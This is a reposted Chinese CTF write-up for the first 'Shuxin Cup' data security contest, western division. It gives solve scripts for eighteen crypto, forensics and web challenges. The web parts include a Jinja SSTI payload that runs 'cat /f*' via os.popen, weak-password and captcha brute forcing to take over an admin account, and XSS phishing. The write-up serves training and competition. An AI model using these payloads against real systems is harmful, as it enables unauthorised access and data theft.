首届“数信杯”数据安全大赛-西部赛区 WP

admin
admin
admin
102795
文章
87
评论
2024年4月23日07:15:12评论24 views字数 25939阅读86分27秒阅读模式

声明:本文内容仅供学习交流,所有因传播利用文章内相关技术造成的不良后果均由使用者本人负责,与本公众号和文章作者无关。如需转载,请注明出处,未经作者允许不得随意删改本文内容。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

晋级

首届“数信杯”数据安全大赛-西部赛区 WP

队伍
 yulin666
 人数
 3
实践题排名
 1
 实践题分数 3932.60
队伍
 郫县男子技校 人数
 3
实践题排名
 6
 实践题分数 2136.40
队伍
 对不起我们是比狗还要差的大专生鼠鼠头鸭
 人数 3
实践题排名
 11
 实践题分数 1733.90
 

解题过程

 

一、定向数据采集

from faker import Faker def fak():    fa = Faker(locale='zh-CN')    return fa.ssn()def datagen():    idcard = fak()  # 确保fak()函数返回一个有效的身份证号码字符串    if int(idcard[-2]) % 2 == 0:        sex = '女'    else:        sex = '男'    # 假设身份证号码中的年份是第7到10位    age = 2024 - int(idcard[6:10])    data = {        "name": "我草",        "sex": sex,  # 直接使用变量sex        "age": str(age),  # 直接使用变量age        "ethnicity": "汉族",        "idcard": idcard,  # 直接使用变量idcard        "phonenumber": "12392911923",        "address": "啊实打实大时代大萨达",        "position": "阿达撒大声地",        "experience": "12"    }    return data
import requests
# 设置请求头部headers = {    'Host': '121.40.65.125:23930',    'Content-Length': '212',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36',    'Content-Type': 'application/json;charset=UTF-8',    'Accept': '*/*',    'Origin': 'http://121.40.65.125:23930',    'Referer': 'http://121.40.65.125:23930/',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'zh-CN,zh;q=0.9',    'Connection': 'close',}for i in range(1200):    data = datagen()
    # 设置POST请求的数据
    # 发送POST请求    response = requests.post('http://121.40.65.125:23930/submit', headers=headers, json=data)    # 打印响应    if 'flag' in response.text:        print(response.text)        break
使用faker模块,等待浏览器弹出flag即可。

 

二、Cloudconsole

 

利用xray扫描

首届“数信杯”数据安全大赛-西部赛区 WP

 

打开xray,访问一会后发现自动登上后台了(弱口令爆破)。

首届“数信杯”数据安全大赛-西部赛区 WP

 

此时是测试账号,因此我们尝试访问账号界面ID=1,得到管理员手机号155666644。

首届“数信杯”数据安全大赛-西部赛区 WP

 

验证码爆破1-9999,得到1234,访问找到flag

首届“数信杯”数据安全大赛-西部赛区 WP

 

flag{Jih7RUPNQHcE6yEJxEXH}

 

三、Backpack

# 导入必要的SageMath库  from sage.all import *    # 原始数据  S = 231282844744  M = [      27811518167, 19889199464, 19122558731, 19966624823, 25670001067,      30690729665, 23936341812, 31011714749, 30524482330, 21737374993,      17530717152, 19140841231, 33846825616, 17334386491, 28867755886,      29354544582, 21758322019, 27261411361, 31465376167, 26145493792,      27075307455, 33514052206, 25397635665, 21970496142, 30801229475,      22405695620, 18486900933, 27071880304, 17919853256, 18072328152,      21108080920  ]    # 构造增广矩阵(包含目标值S作为最后一列)  A = Matrix(ZZ, len(M), len(M) + 1)  for i in range(len(M)):      for j in range(len(M)):          if j == i:              A[i, j] = 2  # 单位矩阵的对角线元素设为2          else:              A[i, j] = 0  # 单位矩阵的非对角线元素设为0      A[i, len(M)] = M[i]  # 最后一列设置为M的元素  A[len(M) - 1, len(M)] = S  # 最后一行的最后一个元素设置为S    # 执行格基约减  A_reduced = A.LLL()  # 使用LLL算法进行格基约减    # 查找可能的解  for row in A_reduced.rows():      # 检查行是否只包含-1, 0, 1      if all(x in [-1, 0, 1] for x in row):          # 提取解,忽略最后一列(即目标值S)          solution = [0 if x == 0 else (1 if x == 1 else -1) for x in row[:-1]]          print("Found solution:", solution)          break  # 假设只找到一个解就停止  else:      print("No solution found.")    # 如果你需要将整数解转换为字节  def int_to_bytes(n):      return n.to_bytes((n.bit_length() + 7) // 8, byteorder='big')    # 假设solution是一个整数列表,你可以这样转换  # solution_bytes = [int_to_bytes(x) for x in solution]

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

四、Backpack_revenge

 

观看代码,进行多次交互后发现那个secrect的长度时固定的23,它这个是用三次的背包加密,给了加密的M和加密的结果。由于secrect长度还是很小,只有23,于是想着继续用那个c++爆破脚本,把里面的dfs改以下就行

#include <bits/stdc++.h>using namespace std;typedef long long LL;const LL maxn = 1e9+10,N=2*1e5+120,g=239,mod=1e9 + 7,cmod=998244353,INF=1e16;int n,m,k,q;LL M[]={685, 2019, 1262, 769, 630, 527, 1192, 1634, 1357, 661, 1164, 784, 2048, 2000, 1239, 1302, 1816, 1918, 1724, 1961, 1831, 1620, 732, 1756, 807, 875, 1940, 1095, 1702, 1514, 1651, 1206, 845, 869, 1638, 935, 1485, 1678, 1407, 696, 828, 841, 1058, 1167, 1478, 1582, 683, 1486, 1372, 1781, 671, 1564, 877, 565, 1519, 1449, 1773, 664, 1355, 1993, 843, 1332, 1943, 1931, 716, 635, 1863, 1271, 2019};LL C[] =  {11881, 11491, 11114};void dfs(int k,LL as1,LL as2,LL as3,LL z){  if(as1==C[0]&&as2==C[1]&&as3==C[2])      printf("%lldn",z);  if(k==23)  {    if(as1==C[0]&&as2==C[1]&&as3==C[2])      printf("%lldn",z);    return;  }  if(as1>C[0]||as2>C[1]||as3>C[2]) return;    dfs(k+1,as1+M[k],as2+M[k+23],as3+M[k+46],(z<<1)^1);  dfs(k+1,as1,as2,as3,(z<<1));  return;}int b[31];int main(){  dfs(0,0,0,0,0);  return 0;}

同时两次交互来解密secret后发现每次解密出的secret都一样,判断secret是个常数,于是直接交这个secret=5000268

以下是交互脚本
from pwn import *r=remote('121.40.65.125',29514)print(r.recvline())print(r.recvline())print(r.recvline())print(r.recvline())r.sendline(b'5000268')print(r.recvline())

结果为

flag{U9VFwHBY3tk46wM4zKav}

 

五、好小的公钥

看代码发现e很小,并且n未给出任何分解相关的有效信息,于是直接去facrordb网站上查询n,失败了。再然后发现两次c1,c2对应的m1,m2只有name有区别,且程序中给出了name的长度20,于是m1,m2只有连续160的比特回有区别。开始时试图分解出name1和name2,失败了。

于是转换思路试图求解出name1-name2,首先由于不知道name的具体所在位置,所以要爆破枚举name的所在位置。然后列出两个c1和c2的方程,

用结点消元法消去y,转变为x的单变量方程,由于x是一个160比特大小的数,分析发现x最高次是9,可以用铜匠攻击,求解出方程小根

直接调用small_roots方法求解出name1-name2

for i in range(3,512):    f = (x*(2^(i*8))+y)^3-c2    g = (y)^3-c1    h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()    #print(h)    print(i)    roots=h.small_roots(X=2^(160),beta=0.5)    if len(roots)!=0:        print(roots)

之后观察f,g这两个方程式存在公共根的,于是对这两个方程求gcd,再把得到的多项式化成y-C的形式(C是一个常数)

再转换C为bytes得到结果

f = (cs1*(2^(ilen*8))+y)^3-c2g = (y)^3-c1def gcd(ux,uy):    while uy:        ux,uy=uy,ux%uy    return uxprint(gcd(f,g))
以下是完整代码

n = 568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296296576270840411168887985994517056879751144774547c1 = 431312103100767688301270873515694180462257583459908234203073002487325117493887047120595913906904515450437699824150951431203682143625472233283131484154340726407655916093919153094880725587387190657282541339852240866740558210935057304045622134333737364837907803284500720912477083278604674191761558055606257265613653371174413735704743368774112560256371957440166273363312892826954931938520339749763587237647531487364315671724711104121476132976721311150162435461040429472367051903062023684424445453470509770755251625919328562598684973145845411949679521293696654238536568271288227873235222254418381637988720403134737388969117301315129764877084098263887038702360875806169943329250942423481218879414262975949372263342542267307509991818876001663343080174068122745544889250468768262778036531643485618966462765400799197337845903384752263868544685704850009883890733780492467688079391036667616844591782969089061420721690202569906456519442030878032969214680094553153977362452465792210460969237703808838958554390073039156314586976508524382532218487645573442266610936598298297875467628751249793552304509948574237292979527475347029486469806949152294324189679630412632233400760461994879210062157065072372411916571806421837168282993333259037632027802003c2 = 111326641811759493604088523562272731454464716671194755315328363821292903187271753249420574406026395878690499347562021194039381824656168455890425774471881313917884834279782521293520897666098947728412358720613339825800136298612478019319813893005212230183582102418424882679301752156049958975894273766026631862041748967780800417583410741108884715313323900093310792257441808867208196444135018606731846323195653209862566605010692791815067942002776912439607453059083583034027686629599715307795110352640886758030641410333262371457801139341561118922116406804672110476329045310692884716196591553487627768331568194031497995162292372362355335942016715203357198021060493558898566979718960008685572625090545387509936034791555171957700118277390090007172285832465740027830724861313089424939667978089316596191454429096123617934705475390965480354286330548814947931157769714442311818706252505465905591041180883235830012150614876110315563201395578841723561829534311600512174988418799061640259280069741788731955575782711935172179986077118656212700160367567297188194157963591548015377609501024174395290161373145148594887695593674066706818905384618972001711737840675693775981586009982344466167108444473750394255025928855839837371545436570899099865485704861P.< x, y > = PolynomialRing(Zmod(n))x, y = P.gens()f1=(x+y)^3f2=(y)^3#c1=f1(2^170,2^1024+1)#c2=f2(0,2^1024+1)print(2^170)cs=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296274073696996381973296121109312481072817280748704cs1=22502573844029195591864885204575806933864025843ilen=401'''for i in range(3,512):    f = (x*(2^(i*8))+y)^3-c2    g = (y)^3-c1    h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()    #print(h)    print(i)    roots=h.small_roots(X=2^(160),beta=0.5)    if len(roots)!=0:        print(roots)'''
f = (cs1*(2^(ilen*8))+y)^3-c2g = (y)^3-c1def gcd(ux,uy):    while uy:        ux,uy=uy,ux%uy    return uxprint(gcd(f,g))xs=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745*y + 249232217447088470017517108532603127647764257231000945606085312343234346642887365573442281891869769573193103809755295005726512948757236723602454366353511322552078203027626328672305530936471332104632068874639021398521141789822008410100566592052144344486764112549833834277894475216405534618656813055976695234344939793969826767235805703568281467044597504160229853401409155512262288680012947215577931092260083233508796579091976557540249899478018883690697564923485431460667780393001915193375256503503266661591463436753250455175675443472187207664310828013636954735651610659845300464092447549538010651864118369569643385989028285347684532913171184569598522190650832934939889916673796900283686359627961384997454512932208052324830350287129526552464117306919240730692089198552066151648221281139803059921708054245746722477829012007595944346291809326829061589655388120563852888555191506731646365114387914597282226318925565157964489075260040098871199811850010522652705956032546776166705080580225160655649392437968020952027410597067308517954169176021203342485946036066103258811091183560926704740999740310353512576181269562376008687822036728706979881848612778922653363446106218734485474774034508565328665848013661791639232681913537490241624318983744

cm=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745import gmpy2 as gpxs*=inverse_mod(cm,n)print(xs)xs2=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136136320995282543074035456056821931776470915459802161035016774910328986323340064723823601358191192724326897349341597000502102018631267199460843264681292311278559465587545719505802671193017964123780363464984077169577833257842589087942545276588392897000332340550822498650429085280357344996478980952876619349606741147197410253135312645035706822347924220099206191876612630068512879551466747348560267800605986697904702251260531364811486554500270930656471997860752246468793935111330200606840355795453673113970438981705435468450471884398372219505972709294983913670835986800227446394410918642907986850955958428639639813925170880382756290935355535155879203798768953032780036589159992638959383219122749581355954232065366797744698220209644443749723244099427237525488376104293995954432591882841220426836527029117318470886992558897709256375615937928900838071657874723813335223008696832349205866902136097335625642357536470120937486648558982174937790178247148170436277149203031706385440784727319730858994878198282598771650570593052976558642print(long_to_bytes(int(xs2)))print(long_to_bytes(int(n-xs2)))print('ok')
结果为

flag{oirh398ryhw9iufs3}

 

六、Prime Conundrum

题中很明显存在多个小量s,t,delta,考虑格攻击

有等式 $sP+tQ+delta+k*n=leak$,题目给出P,Q, n, leak,分析s,t,delta,k都是一个小量,于是直接造格,来获取。

有以下关系,同时在最后一列配上大系数X,保证规约出0

$$ left[ matrix{  s & t &delta & k & 1  } right]*left[ matrix{  1 &  & &  & p&1&&&Q&&1&&1&&&1&n&&&&-leak  } right] =left[ matrix{  s & t &delta & k & 0  } right]$$

代码如下

P = 91307300383014465303389363075431698588933838431961163766796972428733255940234665671679789435258337578396879726483195947952476118985507696067550566875810703327064257916213956673893327976728584687137639337961422903593701591152074826447530099276756806166361533554689114264018344629905535188048343259754284652017Q = 149089411480331249267443825847904508235946280550542428853480950085018092182435890098430254117786823782088885695848943795846175490059759543848516828825072642481794902650586147465149175976488985613001468444893241645390860978312924241181340390543064512602477917112031391367608345501790785857442379515898677467337n = 97339579366356507946846401691835843338581994635020856947574389213640653953117584127557153363761256108433474475102197685296591968229050609482457622390855692102761025647645801250282912327521623082583744902369819132264725498938021235699466656447009532567358416017236962637028458839659218745744825556065623673913N = 72077628115206161977315177371814064093288033362281459918751639032623658967593542855291047617938064177930014574391486973767462937337649946356572406647109942552336519343063401327708412361664750917582404375485334706345485264831286788789648126355202140531434534406410829696252616051882952860015344370516517084357909896281965899571934196572691leak = 45439323369250400352006541741265096780554398472451037280607564706700682873365442581062404781075514235328183754475227917775810587457541607767765455164339314322631781126065808432845447798024685402323868389611285038950397054020330610558058133599416135943335731904873776868614834960217751934513462319743149481906c = 31456530156035981140909630437789986968079386074106871160743980387785993275753486380185420818239283975922682050323918081691381897642776414263991442096807392948925867761878299044300335666219533277719472330029607869735373712681522022301659090108633692457216985013550482473362675907949633024047291607542103649091410575340884845190483766424507hint = 13318665442465244206832303588726230530847297247590371628366697082014350966833522479782161994817212671730145702818662148370306660550486536176566012104254910mar=matrix(ZZ,[[0 for i in range(5)]for j in range(5)])X=2^1024for i in range(4):    mar[i,i]=1mar[4,4]=-leak*Xmar[3,4]=n*Xmar[2,4]=1*Xmar[1,4]=Q*Xmar[0,4]=P*Xprint(mar.LLL()[0])s,t,delta,k,z=mar.LLL()[0]p=hint+sq=n//pprint(p*q==n)e = 65537phi=(p-1)*(q-1)*(delta-1)d=inverse(e,phi)m=pow(c,d,N)print(long_to_bytes(int(m)))
结果为

flag{499959682502a9ee664412774d995c85}

 

七、消逝的曲线

本题就是给了四个点。于是有四个在模p中的方程,椭圆曲线方程 y^2=x^3+a*x+b

有四个方程

$y1^2=x1^3 +a*x1+b quad(modquad p)$

$y2^2=x2^3 +a*x2+bquad (mod quad p)$

$y3^2=x3^3 +a*x3+bquad (modquad p)$

$y4^2=x4^3 +a*x4+bquad (modquad p)$

消除b的影响,有三个方程

$y1^2 - y2^2=x1^3 -x2^3+a*(x1-x2) quad(modquad p)$

$y2^2 - y3^2=x2^3 -x3^3+a*(x2-x3)quad (modquad p)$

$y3^2 - y4^2=x3^3 -x4^3+a*(x3-x4)quad (modquad p)$

再消除a的影响,有两个方程

$(x2-x3)(y1^2-y2^2)-(x2-x3)(x1^3-x2^3)-(x1-x2)((y2^2-y3^2)-(x2^3-x3^3))=0 quad(modquad p)$$(x2-x3)(y3^2-y4^2)-(x2-x3)(x3^3-x4^3)-(x3-x4)((y2^2-y3^2)-(x2^3-x3^3))=0quad(modquad p)$

代入求值,再gcd得到kp,再扔进yafu里分解得到p

然后列出原始四个方程,用groebner解出a,b

最后flag的形式应为flag='flag{' + hashlib.sha256(str((a+b+p)%p  ).encode()).hexdigest() +'}'

代码如下

x1,y1=326672433563808078860194887521653547089556740597 , 184497841037716044508112339838233572527979342579x2,y2=946940648888016429117035739241938283924071224831 , 321676290528200789029428639046110268747006565356x3,y3=466606422274774582389917703171293585058211734594 , 1074845338842713759215696692888593660449409944456x4,y4=800969026528232354813204405831803185648593796532 ,716443765574481260039522236141448382825732855234f1=(x2-x3)*(y1^2-y2^2)-(x2-x3)*(x1^3-x2^3)-(x1-x2)*((y2^2-y3^2)-(x2^3-x3^3))f2=(x2-x3)*(y3^2-y4^2)-(x2-x3)*(x3^3-x4^3)-(x3-x4)*((y2^2-y3^2)-(x2^3-x3^3))print(gcd(f1,f2))p=abs(gcd(f1,f2))from Crypto.Util.number import isPrimep=   1147718459924575949776230905228771300694578329241print(abs(gcd(f1,f2))//11==p)print(isPrime(int(p)))F = []PR.<a,b> = PolynomialRing(Zmod(p))f=y1^2-(x1^3+a*x1+b)F.append(f)f=y2^2-(x2^3+a*x2+b)F.append(f)f=y3^2-(x3^3+a*x3+b)F.append(f)f=y4^2-(x4^3+a*x4+b)F.append(f)res = Ideal(F).groebner_basis()print(res)a=p-562057997528662832671979630483769294719057055570b=p-767226941590139107595679281744178365913055475754print(f'a={a}')print(f'b={b}')print(f'p={p}')print(y1^2%p==(x1^3+a*x1+b)%p)print(y2^2%p==(x2^3+a*x2+b)%p)print(y4^2%p==(x4^3+a*x4+b)%p)import hashlibprint(int(a)+int(b)+int(p))print((int(a)+int(b)+int(p))%p)flag='flag{' + hashlib.sha256(str(int(a)+int(b)+int(p)).encode()).hexdigest() +'}'print(flag)print('flag{'+hashlib.sha256(str(int(966151980730349959284802898229594940757044127158)).encode()).hexdigest()+'}')print('flag{'+hashlib.sha256(str(int(2113870440654925909061033803458366241451622456399)).encode()).hexdigest()+'}')
结果为

$flag{b785a320839a4a51dc206d2ee72ebb2b9039dbed06b43c7c6164a3ce0151eb7b}$

 

八、幻方

import hashlibimport itertoolsfrom string import digits, ascii_letters, punctuationfrom pwn import *from z3 import Int, Solver
context.log_level = 'debug'
def sha(tail, sha256):    alpha_bet=digits+ascii_letters+punctuation    strlist = itertools.product(alpha_bet, repeat=4)
    xxxx=''
    for i in strlist:        data=i[0]+i[1]+i[2]+i[3]        data_sha=hashlib.sha256((data+tail).encode('utf-8')).hexdigest()        if data_sha==sha256:            xxxx=data            break
    return xxxx.encode('utf-8')
def solve(arr):    count = 0    for i in range(3):        for j in range(3):            if arr[i][j] == 'X':                count += 1            else:                arr[i][j] = int(arr[i][j])    ans = [Int(f'ans[{i}]') for i in range(count)]    tmp = 0    for i in range(3):        for j in range(3):            if arr[i][j] == 'X':                arr[i][j] = ans[tmp]                tmp += 1    s = Solver()
    s.add(arr[0][0] + arr[0][1] + arr[0][2] == arr[1][0] + arr[1][1] + arr[1][2])    s.add(arr[1][0] + arr[1][1] + arr[1][2] == arr[2][0] + arr[2][1] + arr[2][2])    s.add(arr[0][0] + arr[1][0] + arr[2][0] == arr[0][1] + arr[1][1] + arr[2][1])    s.add(arr[0][1] + arr[1][1] + arr[2][1] == arr[0][2] + arr[1][2] + arr[2][2])    s.add(arr[0][0] + arr[1][1] + arr[2][2] == arr[0][2] + arr[1][1] + arr[2][0])    print(arr)
    if s.check():        m = s.model()        count = 0        for i in range(3):            for j in range(3):                if type(arr[i][j]) == int:                    continue                arr[i][j] = m[ans[count]].as_long()                count += 1
    print(arr)    res = f"{arr[0][0]} {arr[0][1]} {arr[0][2]}n{arr[1][0]} {arr[1][1]} {arr[1][2]}n{arr[2][0]} {arr[2][1]} {arr[2][2]}n"    return res
r = remote('121.40.65.125', 29175)s = r.recvline().decode('utf-8').replace('n', '').replace('[+] sha256(XXXX+', '')slist = s.split(') == ')xxxx = sha(slist[0], slist[1])
r.recvuntil(b'[+] Plz tell me XXXX: ')r.sendline(xxxx)
r.recvline()l1 = r.recvline().decode('utf-8').replace('n', '').split(' ')l2 = r.recvline().decode('utf-8').replace('n', '').split(' ')l3 = r.recvline().decode('utf-8').replace('n', '').split(' ')arr = []arr.append(l1)arr.append(l2)arr.append(l3)
magic = solve(arr)r.sendline(magic)
r.interactive()

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

九、RWZIP

 

十六进制编辑器查看压缩包存在损坏,插件无法读取完整ZIP数据结构,利用WinRar打开压缩包,密码为1114514,得到的内容镜像一下提交。

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十、MWatch

 

观察流量包发现是手环和手机的蓝牙流量,查看所有ATT协议,发现存在heart_rate_measurement关键词,直接过滤一下查看最大的即可。

# 过滤条件: btatt.heart_rate_measurement.value.8# flag: Mi Smart Band 5_Redmi K40_128

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十一、USBHacker

 

利用工具先提取流量包中的内容,得到32010620021128173,发现缺少了最后一位,由于身份证号的最后一位是校验位,因此可以通过前面17位来进行计算,缺失的数字为3

首届“数信杯”数据安全大赛-西部赛区 WP

def calculate_last_digit(id17):    weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]    validate_list = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']    sum = 0    for i in range(0, len(id17)):        sum += int(id17[i]) * weights[i]    return validate_list[sum % 11]
id17 = '32010620021128173'print(calculate_last_digit(id17))

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十二、cloudplat

 

app.py源码中泄露了登录用户名和密码,登录后存在SSTI模板注入,由于areaid字段的长度都不能超过20,因此将payload拆开来,利用config.update来在config全局对象中分段保存payload

{{config.update(u=lipsum.__globals__)}}{{config.u.os.popen('cat /f*').read()}}

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十三、Baby_RSA

 

由于q的值并不大,因此可以通过枚举q来逆推出n,从而求解m

#!/usr/bin/env python3# -*- coding: utf-8 -*-
# from secret import flag,initfrom Crypto.Util.number import *# from sage.all import *from gmpy2 import *# m = bytes_to_long(flag.encode())# r = getPrime(128)
# p = init# # for i in range(r-1):# #     p += next_prime(init)
# # assert iroot(p,3)[1] == 1# q = getPrime(12)# # N = p*q*r# N = r**4*q# e = getPrime(17)# c = pow(m,e,N)# print(f"r = {r}")# print(f"e = {e}")# print(f"c = {c}")

r = 287040188443069778047400125757341514899e = 96001c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625
for i in range(1000,5000):        if isPrime(i):                phi = (r-1)*r*r*r*(i-1)                d = invert(e, phi)                m = pow(c, d, r**4*i)                if b'flag' in long_to_bytes(m):                        print(long_to_bytes(m))                        exit(0)

# r = 287040188443069778047400125757341514899# e = 96001# c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十四、fun

 

图片中给了xyz三个参数的限制条件,因为构建Z3表达式来求解所有可能得组合,得到随机数种子,从而计算KEY,反解被加密文件。

from z3 import *from Crypto.Cipher import AESimport random
# 创建整数变量x, y, zx, y, z = BitVecs('x y z', 32)
# 创建求解器s = Solver()
# 添加约束条件s.add(0 <= x, x <= 100)  # 0<=x<=100s.add(0 <= y, y <= 100)  # 0<=y<=100s.add(0 <= z, z <= 100)  # 0<=z<=100s.add(x * y != z)  # x*y不等于zs.add(x ^ y == z)s.add((x + y) * z == x * x + y * y)  # (x+y)*z=x^2+y^2s.add(x != y)  # x不等于y
# 获得所有可行解while s.check() == sat:    f=s.model()    s.add(Or(x != s.model()[x], y != s.model()[y], z != s.model()[z]))    rx=f[x].as_long()    ry=f[y].as_long()    rz=f[z].as_long()    random.seed(rx+ry+rz)    key = random.randbytes(16)
    PATH = "encrypted_flag.bin"    with open(PATH, "rb") as file_in:        nonce = file_in.read(16)        tag = file_in.read(16)        ciphertext = file_in.read()
    cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
    # 解密密文    data = cipher.decrypt_and_verify(ciphertext, tag)
    print("The flag is:", data)

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十五、Notebook

 

解零宽字符得到K|2+YG3-hfl|&_U8,然后解Base92FLAGflag{wangdalei}

首届“数信杯”数据安全大赛-西部赛区 WP

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十六、messagebox

 

xss钓鱼,打textareapayload

首届“数信杯”数据安全大赛-西部赛区 WP

 

 

十七、pyc

uncompyle6 -o 1.py secret.pyc import random
def decrypt_file(encrypted_file_path):    random.seed(114514)  # 使用相同的种子以获得相同的随机数序列    with open(encrypted_file_path, "rb") as encrypted_file:        encrypted_data = encrypted_file.read()    decrypted_data = b''    for byte in encrypted_data:        key = random.randint(0, 128)        decrypted_data += chr(byte ^ key).encode()    decrypted_file_path = encrypted_file_path.replace(".enc", ".dec")    with open(decrypted_file_path, "wb") as decrypted_file:        decrypted_file.write(decrypted_data)    return decrypted_file_pathdecrypted_file_path = decrypt_file("flag.enc")print(f"Decrypted file saved as: {decrypted_file_path}")%   
# flag{U_R_g00d_at_do1n_pyc}

 

十八、SU7

 

日志有问题canplayer没有办法直接重放,用脚本先进行处理。

import re
# # 读取CAN消息日志文件 with open('candump-2024-01-22.log', 'r') as file:    can_data = file.read()
 # 使用正则表达式提取每条CAN消息的信息 can_messages = re.findall(r'((d+.d+)) vcan0 (w+)#(w+)', can_data)
 # 将CAN消息转换为canplayer格式 canplayer_format = '' for timestamp, can_id, can_data in can_messages:     canplayer_format += f'({timestamp}) vcan0 {can_id}#{can_data}n'
# # 保存转换后的文件 with open('canplayer-format.log', 'w') as file:     file.write(canplayer_format)
 print('转换完成,新文件保存为canplayer-format.log')
这题用ICSim模拟,可以看到速度表上会突然彪一个很高的速度,但是模拟速度太快了看不太清,然后考虑时间戳以及异常速度,异常速度的指令次数肯定是最少的 直接sort uniq就可以找到了,先把指令过滤出来。

import re
# 读取 candump 日志文件with open('canplayer-format.log', 'r') as file:    lines = file.readlines()
# 定义正则表达式模式pattern = r'(d+.d+) vcan0 (w+#w+)'
# 创建输出文件with open('can_messages.txt', 'w') as output_file:    # 遍历每一行数据    for line in lines:        # 使用正则表达式匹配数据        match = re.match(pattern, line)        if match:            can_message = match.group(1)            output_file.write(can_message + 'n') cat can_messages.txt | sort | uniq -c | sort -n
发现有一个异常值,看起来很离谱,最后提交244#000000F60000对了。

首届“数信杯”数据安全大赛-西部赛区 WP

 

END

首届“数信杯”数据安全大赛-西部赛区 WP

扫码关注我们
御 梦 而 生   如 鹿 归 林 
 

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月23日07:15:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   首届“数信杯”数据安全大赛-西部赛区 WPhttps://cn-sec.com/archives/2680082.html

发表评论

匿名网友 填写信息